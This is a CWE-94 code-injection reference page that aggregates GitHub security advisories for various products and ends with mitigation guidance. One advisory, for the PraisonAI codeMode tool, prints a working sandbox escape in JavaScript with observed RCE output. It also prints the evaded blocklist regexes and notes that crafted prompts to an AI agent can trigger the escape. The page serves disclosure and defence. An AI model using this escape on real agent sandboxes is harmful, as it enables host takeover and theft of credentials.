CWE-94
Allowed-with-ReviewImproper Control of Generation of Code ('Code Injection')
Abstraction: Base · Status: Draft
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
8306 vulnerabilities reference this CWE, most recent first.
GHSA-P5VP-96H6-XQRG
Vulnerability from github – Published: 2022-05-02 03:43 – Updated: 2022-05-02 03:43filter/ww8/ww8par2.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted sprmTSetBrc table property modifier in a Word document, related to a "boundary error flaw."
{
"affected": [],
"aliases": [
"CVE-2009-3302"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2010-02-16T19:30:00Z",
"severity": "HIGH"
},
"details": "filter/ww8/ww8par2.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted sprmTSetBrc table property modifier in a Word document, related to a \"boundary error flaw.\"",
"id": "GHSA-p5vp-96h6-xqrg",
"modified": "2022-05-02T03:43:49Z",
"published": "2022-05-02T03:43:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3302"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=533043"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56241"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10022"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00005.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/38567"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/38568"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/38695"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/38921"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/41818"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/60799"
},
{
"type": "WEB",
"url": "http://securitytracker.com/id?1023591"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2010/dsa-1995"
},
{
"type": "WEB",
"url": "http://www.gentoo.org/security/en/glsa/glsa-201408-19.xml"
},
{
"type": "WEB",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:221"
},
{
"type": "WEB",
"url": "http://www.openoffice.org/security/bulletin.html"
},
{
"type": "WEB",
"url": "http://www.openoffice.org/security/cves/CVE-2009-3301-3302.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html"
},
{
"type": "WEB",
"url": "http://www.redhat.com/support/errata/RHSA-2010-0101.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/38218"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-903-1"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/cas/techalerts/TA10-287A.html"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/0366"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/0635"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/2905"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-P5X7-32HJ-QCXR
Vulnerability from github – Published: 2024-12-26 21:30 – Updated: 2024-12-26 21:30TOTOLINK A3002R V4.0.0-B20230531.1404 is vulnerable to Remote Code Execution in /bin/boa via formWsc.
{
"affected": [],
"aliases": [
"CVE-2024-54907"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-26T19:15:08Z",
"severity": "HIGH"
},
"details": "TOTOLINK A3002R V4.0.0-B20230531.1404 is vulnerable to Remote Code Execution in /bin/boa via formWsc.",
"id": "GHSA-p5x7-32hj-qcxr",
"modified": "2024-12-26T21:30:36Z",
"published": "2024-12-26T21:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54907"
},
{
"type": "WEB",
"url": "https://github.com/MnrikSrins/totolink_A3002R_RCE"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P62G-JHG6-V3RQ
Vulnerability from github – Published: 2021-04-07 20:37 – Updated: 2024-11-18 16:26A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.11, and 2.9.7 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ansible"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0a1"
},
{
"fixed": "2.7.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ansible"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0a1"
},
{
"fixed": "2.8.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ansible"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0a1"
},
{
"fixed": "2.9.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-10684"
],
"database_specific": {
"cwe_ids": [
"CWE-250",
"CWE-362",
"CWE-862",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-05T14:46:48Z",
"nvd_published_at": "2020-03-24T14:15:00Z",
"severity": "MODERATE"
},
"details": "A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.11, and 2.9.7 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.",
"id": "GHSA-p62g-jhg6-v3rq",
"modified": "2024-11-18T16:26:11Z",
"published": "2021-04-07T20:37:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10684"
},
{
"type": "WEB",
"url": "https://github.com/ansible/ansible/commit/0b4788a71fc7d24ffa957a94ee5e23d6a9733ab0"
},
{
"type": "WEB",
"url": "https://github.com/ansible/ansible/commit/1d0d2645eed36ac4e17052ab4eacf240132d96fb"
},
{
"type": "WEB",
"url": "https://github.com/ansible/ansible/commit/5eabf7bb93c9bfc375b806a2b1f623d650cddc2b"
},
{
"type": "WEB",
"url": "https://github.com/ansible/ansible/commit/a9d2ceafe429171c0e2ad007058b88bae57c74ce"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10684"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-p62g-jhg6-v3rq"
},
{
"type": "PACKAGE",
"url": "https://github.com/ansible/ansible"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-207.yaml"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202006-11"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-4950"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Code Injection, Race Condition, and Execution with Unnecessary Privileges in Ansible"
}
GHSA-P652-R243-C9CJ
Vulnerability from github – Published: 2022-05-14 02:36 – Updated: 2022-05-14 02:36Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle an uninitialized pointer during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Uninitialized Pointer Vulnerability."
{
"affected": [],
"aliases": [
"CVE-2010-2747"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2010-10-13T19:00:00Z",
"severity": "HIGH"
},
"details": "Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle an uninitialized pointer during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka \"Word Uninitialized Pointer Vulnerability.\"",
"id": "GHSA-p652-r243-c9cj",
"modified": "2022-05-14T02:36:42Z",
"published": "2022-05-14T02:36:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2747"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-079"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7121"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/514310/100/0/threaded"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/cas/techalerts/TA10-285A.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-P655-2748-W2PM
Vulnerability from github – Published: 2022-05-01 23:31 – Updated: 2022-05-01 23:31Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.1 through 3.6.0.244 on Windows allows remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Full Name field of a reviewer of a business item entry, accessible through (1) the SkypeFind dialog and (2) a skype:?skypefind URI for the skype: URI handler.
{
"affected": [],
"aliases": [
"CVE-2008-0582"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-02-05T03:00:00Z",
"severity": "MODERATE"
},
"details": "Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.1 through 3.6.0.244 on Windows allows remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Full Name field of a reviewer of a business item entry, accessible through (1) the SkypeFind dialog and (2) a skype:?skypefind URI for the skype: URI handler.",
"id": "GHSA-p655-2748-w2pm",
"modified": "2022-05-01T23:31:43Z",
"published": "2022-05-01T23:31:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-0582"
},
{
"type": "WEB",
"url": "http://aviv.raffon.net/2008/01/31/AttackersCanSkypeFindYou.aspx"
},
{
"type": "WEB",
"url": "http://www.kb.cert.org/vuls/id/794236"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/487370/100/0/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/27338"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-P65M-QR5X-RRQQ
Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2023-01-26 21:22The message function in lib/webbynode/notify.rb in the Webbynode gem 1.0.5.3 and earlier for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a growlnotify message.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "webbynode"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.5.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2013-7086"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:48:09Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The message function in `lib/webbynode/notify.rb` in the Webbynode gem 1.0.5.3 and earlier for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a growlnotify message.",
"id": "GHSA-p65m-qr5x-rrqq",
"modified": "2023-01-26T21:22:44Z",
"published": "2017-10-24T18:33:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7086"
},
{
"type": "WEB",
"url": "https://github.com/webbynode/webbynode/pull/85"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89705"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/webbynode/CVE-2013-7086.yml"
},
{
"type": "PACKAGE",
"url": "https://github.com/webbynode/webbynode"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20200229074410/http://www.securityfocus.com/bid/64289"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20201208124343/http://www.vapid.dhs.org/advisories/webbynode-command-inj.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/124421"
},
{
"type": "WEB",
"url": "http://seclists.org/oss-sec/2013/q4/493"
},
{
"type": "WEB",
"url": "http://seclists.org/oss-sec/2013/q4/497"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Webbynode Code Injection vulnerability"
}
GHSA-P65R-6GPP-MR6J
Vulnerability from github – Published: 2022-05-17 00:40 – Updated: 2022-05-17 00:40PHP remote file inclusion vulnerability in _conf/_php-core/common-tpl-vars.php in PHPmyGallery 1.5 beta allows remote attackers to execute arbitrary PHP code via a URL in the admindir parameter, a different vector than CVE-2008-6317.
{
"affected": [],
"aliases": [
"CVE-2008-6318"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2009-02-27T11:30:00Z",
"severity": "HIGH"
},
"details": "PHP remote file inclusion vulnerability in _conf/_php-core/common-tpl-vars.php in PHPmyGallery 1.5 beta allows remote attackers to execute arbitrary PHP code via a URL in the admindir parameter, a different vector than CVE-2008-6317.",
"id": "GHSA-p65r-6gpp-mr6j",
"modified": "2022-05-17T00:40:16Z",
"published": "2022-05-17T00:40:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-6318"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/7399"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/32723"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-P673-HJF2-PWFR
Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2023-07-03 23:38command_wrap.rb in the command_wrap Gem for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a URL or filename.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "command_wrap"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.6.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2013-1875"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:48:11Z",
"nvd_published_at": "2013-03-20T22:55:00Z",
"severity": "HIGH"
},
"details": "command_wrap.rb in the command_wrap Gem for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a URL or filename.",
"id": "GHSA-p673-hjf2-pwfr",
"modified": "2023-07-03T23:38:02Z",
"published": "2017-10-24T18:33:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1875"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-p673-hjf2-pwfr"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/command_wrap/CVE-2013-1875.yml"
},
{
"type": "PACKAGE",
"url": "https://github.com/slicertje/commandwrap"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/120847/Ruby-Gem-Command-Wrap-Command-Execution.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2013/Mar/175"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2013/03/19/9"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Shell command injection in command_wrap"
}
GHSA-P693-2VFQ-FPVW
Vulnerability from github – Published: 2021-12-16 00:02 – Updated: 2022-07-13 00:01Microsoft Defender for IoT Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-41365, CVE-2021-42310, CVE-2021-42313, CVE-2021-42314, CVE-2021-42315, CVE-2021-43882, CVE-2021-43889.
{
"affected": [],
"aliases": [
"CVE-2021-42311"
],
"database_specific": {
"cwe_ids": [
"CWE-89",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-15T15:15:00Z",
"severity": "CRITICAL"
},
"details": "Microsoft Defender for IoT Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-41365, CVE-2021-42310, CVE-2021-42313, CVE-2021-42314, CVE-2021-42315, CVE-2021-43882, CVE-2021-43889.",
"id": "GHSA-p693-2vfq-fpvw",
"modified": "2022-07-13T00:01:42Z",
"published": "2021-12-16T00:02:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42311"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42311"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1556"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P69M-4F92-2V84
Vulnerability from github – Published: 2026-06-18 14:26 – Updated: 2026-06-18 14:26Summary
The codeMode tool in src/praisonai-ts/src/tools/builtins/code-mode.ts uses new Function() with a with(sandbox) pattern to execute LLM-generated code. The blocklist-based "sandbox" can be trivially bypassed via Function('return this')() to recover the global object, followed by global.require() with string concatenation to evade the blocklist regex. This allows full arbitrary code execution on the host system. This affects all deployments where the code-mode tool is enabled for agents.
Details
Vulnerable code (lines 187–191):
const fn = new Function(
'sandbox',
`with (sandbox) { ${code} }`
);
const result = fn(sandbox);
The code parameter comes from LLM tool call arguments (the execute method at line 104). Before execution, a regex-based blocklist is applied (lines 108–136):
const blockedPatterns = [
/require\s*\(\s*['"]child_process['"]\s*\)/,
/require\s*\(\s*['"]fs['"]\s*\)/,
/import\s+.*from\s+['"]child_process['"]/,
/process\.exit/,
/eval\s*\(/,
];
Three fundamental weaknesses:
-
with(sandbox)does not provide isolation. Thewithstatement in JavaScript adds an object to the scope chain but does NOT prevent accessing the global object. The sandbox object setsprocess: undefinedandrequire: undefined, but these are recovered via the global scope:javascript const g = Function('return this')(); g.require('child_' + 'process') -
Blocklist evasion via string concatenation. The regex
/require\s*\(\s*['"]child_process['"]\s*\)/requires the literal string'child_process'or"child_process"insiderequire(). Usingrequire('child_' + 'process')bypasses this because the regex sees a variable concatenation, not a literal string. -
Function('return this')()is not blocked. None of the blocklist patterns matchFunction(,return this, orglobal.require.
PoC
Setup: Clean checkout at commit d5f1114a, Node.js v20.20.0 (tested environment).
Positive trigger — full RCE with sandbox escape (OBSERVED OUTPUT):
// This code bypasses ALL blocklist patterns and achieves RCE:
const code = `
const Func = (function(){}).constructor;
const proc = Func('return process')();
console.log('process.version:', proc.version);
const g = Function('return this')();
const mod = 'child_' + 'process';
const cp = g.require(mod);
console.log('RCE:', cp.execSync('id').toString().trim());
`;
Observed output (executed in this environment):
OUT: process.version: v20.20.0
OUT: RCE: uid=1000(sondt23) gid=1000(sondt23) groups=1000(sondt23),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin),983(docker),984(ollama)
The escape was confirmed by executing the exact code-mode sandbox pattern (new Function('sandbox', 'with (sandbox) { ... }')) with the blocklist applied first. ALL blocklist patterns were bypassed, and the id command returned the real system user ID.
Negative control — blocklist correctly catches direct require:
const code = `require('child_process')`;
// Returns: "Blocked pattern detected: require\s*\(\s*['"]child_process['"]\s*\)"
Negative control — blocklist correctly catches eval:
const code = `eval('process')`;
// Returns: "Blocked pattern detected: eval\s*\("
Cleanup: No persistence needed; the code runs in-process.
Impact
An attacker who can influence the code parameter of the codeMode tool (via crafted prompts to an AI agent using praisonai-ts) achieves full arbitrary code execution on the host system. This includes:
- Read/write any file accessible to the process user
- Execute arbitrary system commands via
child_process - Exfiltrate environment variables containing API keys, tokens, and credentials
- Install persistent backdoors by writing to startup files
- Move laterally in containerized environments
Suggested remediation
The with(sandbox) + blocklist pattern is fundamentally insecure and cannot be fixed with regex improvements. Replace it with:
- Use
vmmodule with proper context isolation:
import { createContext, runInContext } from 'vm';
const sandbox = createContext({ /* safe globals only */ });
runInContext(code, sandbox, { timeout: 5000 });
-
Or use
isolated-vmfor true process-level isolation with separate V8 isolates. -
Or run code in a subprocess (like the Python
_execute_code_sandboxedpattern already used inpython_tools.py) with a clean environment and resource limits. -
If a blocklist approach must be retained, add patterns for:
Function(/new Functionconstructor/__proto__/prototypereturn this/return globalglobal/globalThis/windowBut note: blocklist approaches are inherently fragile and will continue to have bypasses.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.7.1"
},
"package": {
"ecosystem": "npm",
"name": "praisonai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.7.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T14:26:37Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Summary\n\nThe `codeMode` tool in `src/praisonai-ts/src/tools/builtins/code-mode.ts` uses `new Function()` with a `with(sandbox)` pattern to execute LLM-generated code. The blocklist-based \"sandbox\" can be trivially bypassed via `Function(\u0027return this\u0027)()` to recover the global object, followed by `global.require()` with string concatenation to evade the blocklist regex. This allows full arbitrary code execution on the host system. This affects all deployments where the code-mode tool is enabled for agents.\n## Details\n**Vulnerable code (lines 187\u2013191):**\n```typescript\nconst fn = new Function(\n \u0027sandbox\u0027,\n `with (sandbox) { ${code} }`\n);\nconst result = fn(sandbox);\n```\n\nThe `code` parameter comes from LLM tool call arguments (the `execute` method at line 104). Before execution, a regex-based blocklist is applied (lines 108\u2013136):\n\n```typescript\nconst blockedPatterns = [\n /require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)/,\n /require\\s*\\(\\s*[\u0027\"]fs[\u0027\"]\\s*\\)/,\n /import\\s+.*from\\s+[\u0027\"]child_process[\u0027\"]/,\n /process\\.exit/,\n /eval\\s*\\(/,\n];\n```\n\n**Three fundamental weaknesses:**\n\n1. **`with(sandbox)` does not provide isolation.** The `with` statement in JavaScript adds an object to the scope chain but does NOT prevent accessing the global object. The sandbox object sets `process: undefined` and `require: undefined`, but these are recovered via the global scope:\n ```javascript\n const g = Function(\u0027return this\u0027)();\n g.require(\u0027child_\u0027 + \u0027process\u0027)\n ```\n\n2. **Blocklist evasion via string concatenation.** The regex `/require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)/` requires the literal string `\u0027child_process\u0027` or `\"child_process\"` inside `require()`. Using `require(\u0027child_\u0027 + \u0027process\u0027)` bypasses this because the regex sees a variable concatenation, not a literal string.\n\n3. **`Function(\u0027return this\u0027)()` is not blocked.** None of the blocklist patterns match `Function(`, `return this`, or `global.require`.\n\n## PoC\n\n**Setup:** Clean checkout at commit `d5f1114a`, Node.js v20.20.0 (tested environment).\n\n**Positive trigger \u2014 full RCE with sandbox escape (OBSERVED OUTPUT):**\n```javascript\n// This code bypasses ALL blocklist patterns and achieves RCE:\nconst code = `\nconst Func = (function(){}).constructor;\nconst proc = Func(\u0027return process\u0027)();\nconsole.log(\u0027process.version:\u0027, proc.version);\nconst g = Function(\u0027return this\u0027)();\nconst mod = \u0027child_\u0027 + \u0027process\u0027;\nconst cp = g.require(mod);\nconsole.log(\u0027RCE:\u0027, cp.execSync(\u0027id\u0027).toString().trim());\n`;\n```\n\n**Observed output (executed in this environment):**\n```\nOUT: process.version: v20.20.0\nOUT: RCE: uid=1000(sondt23) gid=1000(sondt23) groups=1000(sondt23),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin),983(docker),984(ollama)\n```\n\nThe escape was confirmed by executing the exact code-mode sandbox pattern (`new Function(\u0027sandbox\u0027, \u0027with (sandbox) { ... }\u0027)`) with the blocklist applied first. ALL blocklist patterns were bypassed, and the `id` command returned the real system user ID.\n\n**Negative control \u2014 blocklist correctly catches direct require:**\n```javascript\nconst code = `require(\u0027child_process\u0027)`;\n// Returns: \"Blocked pattern detected: require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)\"\n```\n\n**Negative control \u2014 blocklist correctly catches eval:**\n```javascript\nconst code = `eval(\u0027process\u0027)`;\n// Returns: \"Blocked pattern detected: eval\\s*\\(\"\n```\n\n**Cleanup:** No persistence needed; the code runs in-process.\n\n## Impact\n\nAn attacker who can influence the `code` parameter of the `codeMode` tool (via crafted prompts to an AI agent using praisonai-ts) achieves **full arbitrary code execution** on the host system. This includes:\n\n- **Read/write any file** accessible to the process user\n- **Execute arbitrary system commands** via `child_process`\n- **Exfiltrate environment variables** containing API keys, tokens, and credentials\n- **Install persistent backdoors** by writing to startup files\n- **Move laterally** in containerized environments\n\n## Suggested remediation\n\nThe `with(sandbox)` + blocklist pattern is fundamentally insecure and cannot be fixed with regex improvements. Replace it with:\n\n1. **Use `vm` module with proper context isolation:**\n```typescript\nimport { createContext, runInContext } from \u0027vm\u0027;\nconst sandbox = createContext({ /* safe globals only */ });\nrunInContext(code, sandbox, { timeout: 5000 });\n```\n\n2. **Or use `isolated-vm`** for true process-level isolation with separate V8 isolates.\n\n3. **Or run code in a subprocess** (like the Python `_execute_code_sandboxed` pattern already used in `python_tools.py`) with a clean environment and resource limits.\n\n4. If a blocklist approach must be retained, add patterns for:\n - `Function(` / `new Function`\n - `constructor` / `__proto__` / `prototype`\n - `return this` / `return global`\n - `global` / `globalThis` / `window`\n But note: blocklist approaches are inherently fragile and will continue to have bypasses.",
"id": "GHSA-p69m-4f92-2v84",
"modified": "2026-06-18T14:26:37Z",
"published": "2026-06-18T14:26:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-p69m-4f92-2v84"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI: Remote Code Execution via Sandbox Escape in `codeMode` Tool"
}
Mitigation
Strategy: Refactoring
Refactor your program so that you do not have to dynamically generate code.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Mitigation MIT-32
Strategy: Compilation or Build Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-32
Strategy: Environment Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-242: Code Injection
